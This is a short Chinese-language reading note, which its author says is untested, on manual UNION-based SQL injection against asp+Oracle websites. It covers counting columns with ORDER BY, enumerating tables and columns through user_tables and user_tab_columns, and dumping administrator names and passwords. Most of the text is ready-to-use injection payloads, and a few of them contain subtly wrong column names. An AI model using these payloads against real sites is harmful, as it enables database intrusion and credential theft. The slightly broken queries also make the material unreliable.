本文为读书笔记,未实验检验。
注:Oracle中除命令外是大小写敏感的,而user_tables、user_table_columns此二表默认都是大写的。
1.找注入点
本文针对:报错关键字:REA-01xxx,目标站搭配:asp+ORACLE
2.Order by 判断字段数
由于Oracle不自动匹配字段数据类型,先用NULL代替,再逐个确定每个字段的数据类型。假如最后得出语句:
union select 1,'2','3','4','5','6','7',null,'1','0','11',12 from dual--
假设'5'可以得到相关信息。
3.爆表爆字段。
Oracle基本不需爆库,当旁注时才可能用到其他库。
确定当前库的数据表总数:
union select 1,'2','3','4',to_char(count(table_name)),'6','7',null,'1','0','11',12 from
user_tables--
可以在'5’处得知数据表总数
开始爆表名:
union select 1,'2','3','4',table_name,'6','7',null,'1','0','11',12 from user_tables where
rownum=1--
union select 1,'2','3','4',table_name,'6','7',null,'1','0','11',12 from user_tables where
rownum=1 and table not in('ADCOLUMN')--
每爆出一个,就在in()中加入一个。
下面继续爆字段,假如管理员表为BACKUSER
union select 1,'2','3','4',column_name,'6','7',null,'1','0','11',12 from user_tab_columns where
rownum=1 and table_name='BACKUSER'--
union select 1,'2','3','4',column_name,'6','7',null,'1','0','11',12 from user_tab_columns where
rownum=1 and table='BACKUSER' and column not in('GID')--
每爆出一个,就在in()中加入一个。
4.表名字段名都确定后,开始爆内容。
假如name,password为关键字段。
union select 1,'2','3','4',name||chr(124)||password,'6','7',null,'1','0','11',12 from BACKUSER
where rownum=1--
union select 1,'2','3','4',name||chr(124)||password,'6','7',null,'1','0','11',12 from BACKUSER
where rownum=1 and name<>'信息部'--
直到所有内容爆出